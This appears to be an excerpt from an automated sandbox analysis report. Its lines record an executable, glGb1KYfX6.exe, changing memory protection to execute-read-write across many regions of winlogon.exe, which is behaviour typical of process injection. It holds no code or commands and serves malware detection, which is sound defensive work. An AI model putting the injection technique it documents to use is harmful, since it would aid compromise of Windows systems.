Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE60000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE61000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE74000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE76000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE78000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE80000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE81000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE94000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE96000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE98000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEA0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEA1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEB4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEB6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEB8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEC0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEC1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CED4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CED6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CED8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEE0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEE1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEF4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEF6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEF8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF00000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF01000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF14000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF16000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF18000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF20000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF21000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF34000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF36000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF38000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF40000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF41000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF54000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF56000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF58000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF60000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF61000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF74000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF76000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF78000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF80000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF81000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF94000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF96000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF98000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFA0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFA1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFB4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFB6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFB8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFC0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFC1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFD4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFD6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFD8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFE0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFE1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFF4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFF6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFF8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D000000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D001000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D014000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D016000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D018000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D020000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D021000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D034000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D036000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D038000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D040000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D041000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D054000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D056000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D058000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D060000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D061000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D074000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D076000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D078000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D080000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D081000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D094000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D096000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D098000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0A0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0A1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0B4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0B6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0B8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0C0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0C1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0D4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0D6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0D8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0E0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0E1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0F4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0F6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0F8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D100000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D101000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D114000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D116000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D118000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D120000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D121000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D134000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D136000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D138000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D140000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D141000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D154000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D156000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D158000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D160000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D161000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D174000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D176000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D178000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D180000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D181000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D194000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D196000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D198000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1A0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1A1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1B4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1B6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1B8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1C0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1C1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1D4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1D6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1D8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1E0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1E1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1F4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1F6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1F8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D200000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D201000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D214000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D216000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D218000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D220000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D221000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D234000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D236000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D238000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D240000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D241000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D254000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D256000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D258000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D260000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D261000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D274000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D276000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D278000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D280000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D281000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D294000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D296000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D298000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2A0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2A1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2B4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2B6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2B8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2C0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2C1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2D4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2D6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2D8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2E0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2E1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2F4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2F6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2F8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D300000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D301000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D314000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D316000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D318000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D320000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D321000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D334000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D336000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D338000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D340000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D341000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D354000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D356000 protect: page execute and read and writeJump to behavior
